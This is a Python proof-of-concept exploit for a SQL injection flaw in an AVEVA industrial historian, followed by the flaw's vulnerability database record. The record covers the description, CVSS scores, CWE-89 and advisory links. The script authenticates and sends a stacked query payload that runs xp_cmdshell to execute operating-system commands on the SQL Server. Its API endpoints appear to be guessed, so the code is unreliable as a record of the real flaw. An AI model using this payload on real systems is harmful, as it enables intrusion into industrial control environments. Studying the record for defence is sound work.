CVE-2025-61943

# CVE-2025-61943 PoC - SQL Injection in Aveva Captive Historian # This PoC demonstrates SQL injection via query tampering import requests import json # Configuration target = "https://target-aveva-server.local" cve_id = "CVE-2025-61943" # Authentication with Process Optimization Standard User credentials auth = { "username": "standard_user", "password": "password123" } # SQL Injection payload for command execution # Note: This is a conceptual PoC. Actual exploitation requires proper authentication. payload = { "query": "SELECT * FROM HistorianData WHERE TagName = 'test'; EXEC xp_cmdshell 'whoami'; --", "user_level": "Process Optimization Standard User" } # Attempt to exploit SQL injection def exploit_sql_injection(): session = requests.Session() # Login login_url = f"{target}/api/auth/login" login_response = session.post(login_url, json=auth) if login_response.status_code != 200: print(f"[-] Authentication failed") return None print(f"[+] Authenticated successfully") # Send malicious query query_url = f"{target}/api/historian/query" headers = { "Content-Type": "application/json", "User-Agent": f"{cve_id} PoC" } try: response = session.post(query_url, json=payload, headers=headers, timeout=30) print(f"[*] Query sent, status: {response.status_code}") return response.json() except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": print(f"[*] Testing {cve_id}") result = exploit_sql_injection() if result: print(f"[+] Exploitation successful: {json.dumps(result, indent=2)}")

{"cve": {"id": "CVE-2025-61943", "sourceIdentifier": "[email protected]", "published": "2026-01-16T02:16:45.093", "lastModified": "2026-01-22T15:19:41.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability, if exploited, could allow an authenticated miscreant \n(Process Optimization Standard User) to tamper with queries in Captive \nHistorian and achieve code execution under SQL Server administrative \nprivileges, potentially resulting in complete compromise of the SQL \nServer."}, {"lang": "es", "value": "La vulnerabilidad, si se explota, podría permitir a un malhechor autenticado (Usuario Estándar de Optimización de Procesos) manipular consultas en Captive Historian y lograr la ejecución de código bajo privilegios administrativos de SQL Server, resultando potencialmente en el compromiso total del SQL Server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aveva:process_optimization:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025", "matchCriteriaId": "6048CC3D-EA33-484F-9223-10632815D595"}]}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-015-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://softwaresupportsp.aveva.com/en-US/downloads/products/details/a643eaa3-0d85-4fde-ac11-5239e87a68ea", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.aveva.com/en/support-and-success/cyber-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-015-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}